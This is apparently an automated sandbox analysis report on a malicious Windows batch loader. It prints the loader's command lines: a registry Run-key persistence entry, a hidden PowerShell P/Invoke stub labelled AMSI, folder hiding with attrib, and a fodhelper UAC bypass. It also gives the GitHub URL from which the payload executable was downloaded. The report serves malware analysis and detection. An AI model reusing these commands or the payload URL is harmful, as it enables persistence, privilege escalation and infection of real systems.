File name:

TriageTest.bat

Full analysis: https://app.any.run/tasks/0b6938cb-4226-4f08-b7b1-7bb4df893cb3
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 08, 2025, 12:00:24
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
github
loader
uac
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with very long lines (411), with CRLF line terminators
MD5:

23F4A4DB0D6DE43634EBA46A4C6992E7

SHA1:

A0D877CD191E041F9F54D8D2C777A5A72385925C

SHA256:

D6BC74A7FA74244311895DB679675D0E6EB4C68378613475595A7CD1DD2DF694

SSDEEP:

48:yfWNFFOurLufL5z09DnQI9J++MTTWMTHWBrN6p:LFF3rK10hnQI9JlGqG2Brop

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7012)
      • powershell.exe (PID: 3100)
    • Changes the autorun value in the registry

      • reg.exe (PID: 2244)
    • Bypass User Account Control (fodhelper)

      • fodhelper.exe (PID: 2420)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7052)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 7052)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 7012)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7052)
    • Executes script without checking the security policy

      • powershell.exe (PID: 3100)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7012)
      • csc.exe (PID: 6248)
    • Imports DLL using pinvoke

      • powershell.exe (PID: 3100)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6248)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7052)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 7052)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 7052)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 7012)
    • Checks proxy server information

      • powershell.exe (PID: 7012)
      • slui.exe (PID: 5596)
    • Checks supported languages

      • csc.exe (PID: 6248)
      • cvtres.exe (PID: 4692)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 6248)
    • Create files in a temporary directory

      • cvtres.exe (PID: 4692)
      • csc.exe (PID: 6248)
    • Reads the software policy settings

      • slui.exe (PID: 5596)
    • Reads security settings of Internet Explorer

      • fodhelper.exe (PID: 2420)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
15
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe powershell.exe no specs csc.exe cvtres.exe no specs attrib.exe no specs attrib.exe no specs reg.exe fodhelper.exe no specs fodhelper.exe no specs fodhelper.exe timeout.exe no specs tiworker.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
968C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -EmbeddingC:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
2096fodhelper.exe C:\Windows\System32\fodhelper.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Features On Demand Helper
Exit code:
3221226540
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\fodhelper.exe
c:\windows\system32\ntdll.dll
2244reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Updater" /d "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Cache\HeyTriage" /fC:\Windows\System32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
2420"C:\WINDOWS\system32\fodhelper.exe" C:\Windows\System32\fodhelper.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Features On Demand Helper
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\fodhelper.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\combase.dll
3100powershell -NoP -W hidden -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class AMSI { [DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport(\"kernel32.dll\")] public static extern bool VirtualFree(IntPtr lpAddress, uint dwSize, uint dwFreeType); }'; [AmSI]::new()"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
4448"C:\WINDOWS\system32\fodhelper.exe" C:\Windows\System32\fodhelper.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Features On Demand Helper
Exit code:
3221226540
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\fodhelper.exe
c:\windows\system32\ntdll.dll
4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES16A2.tmp" "c:\Users\admin\AppData\Local\Temp\CSC55ECC4BAD9654A8EA221BE861472BC.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
4724attrib +h +s "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Cache"C:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
5360timeout /t 4 C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
5596C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
16 203
Read events
16 148
Write events
55
Delete events
0

Modification events

(PID) Process:(2244) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Updater
Value:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Cache\HeyTriage
(PID) Process:(2420) fodhelper.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2420) fodhelper.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(2420) fodhelper.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2420) fodhelper.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(968) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31172733
(PID) Process:(968) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
(PID) Process:(968) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31172734
(PID) Process:(968) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
27757466
(PID) Process:(968) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
27914821
Executable files
2
Suspicious files
2
Text files
8
Unknown types
1

Dropped files

PID
Process
Filename
Type
7012powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Cache\HeyTriageexecutable
MD5:090BC5A664B2714D24D5520FB4469536
SHA256:05DE6E9D2530D508683F41CE1C7FDFE6041DE637F7E876C69A569EDFFB974560
6248csc.exeC:\Users\admin\AppData\Local\Temp\CSC55ECC4BAD9654A8EA221BE861472BC.TMPbinary
MD5:9CD6E80E12688A44FDD052F215822ED6
SHA256:7FD7E5161B1CB0C655CCD783F3BE2B32376425322ABB898EAC8B925A655CA8C5
3100powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0jrgippp.3qr.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7012powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zvdceaez.s0l.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7012powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pyipgp0h.r4j.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3100powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_utuptizs.kcb.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6248csc.exeC:\Users\admin\AppData\Local\Temp\xt0nez5o.outtext
MD5:6A4EBEDA456808E02B400D6CA94E7CDA
SHA256:D1B1407BC0ABA8AAB5C897A51B287D14640BC92C35ED966BB0D014910D08B345
4692cvtres.exeC:\Users\admin\AppData\Local\Temp\RES16A2.tmpo
MD5:FA6E135A4E155D32E9B65805AEE43256
SHA256:940724DB2002B469BD17768112B05534ABE190806D0557EE890265B457104579
7012powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:3B11FA600ED0989D4A1E56A13BD91D6B
SHA256:575B59C379BDCC1CFC4D2BBA9A6CB8AFA6C9D169C2E84784E87334CE4D5A684A
6248csc.exeC:\Users\admin\AppData\Local\Temp\xt0nez5o.dllexecutable
MD5:321DFD515E3EB6FF9110BC611CB1553B
SHA256:F1C4601A0B82638ECD8DC3F74F7275AA5AD2F35956A8B9F96A951C622CF1A60C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
24
DNS requests
6
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
404
104.86.148.134:443
https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop
unknown
html
26 b
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
GET
200
140.82.121.4:443
https://raw.githubusercontent.com/XeroxzB/weqeq/main/asdasdasdasdasd.exe
unknown
executable
3.11 Mb
whitelisted
POST
404
2.16.204.155:443
https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-US
unknown
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
7012
powershell.exe
185.199.108.133:443
raw.githubusercontent.com
FASTLY
US
whitelisted
4
System
192.168.100.255:137
whitelisted
4156
SystemSettings.exe
2.16.204.134:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4156
SystemSettings.exe
104.86.148.134:443
cxcs.microsoft.net
AKAMAI-AS
DE
whitelisted
5528
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5596
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
google.com
  • 142.250.102.102
  • 142.250.102.101
  • 142.250.102.139
  • 142.250.102.138
  • 142.250.102.100
  • 142.250.102.113
whitelisted
raw.githubusercontent.com
  • 185.199.108.133
  • 185.199.109.133
  • 185.199.111.133
  • 185.199.110.133
whitelisted
cxcs.microsoft.net
  • 104.86.148.134
whitelisted
www.bing.com
  • 2.16.204.134
  • 2.16.204.157
  • 2.16.204.138
  • 2.16.204.159
  • 2.16.204.139
  • 2.16.204.158
  • 2.16.204.155
  • 2.16.204.151
  • 2.16.204.156
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for EXE via Powershell
Misc activity
ET HUNTING EXE Downloaded from Github
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
No debug info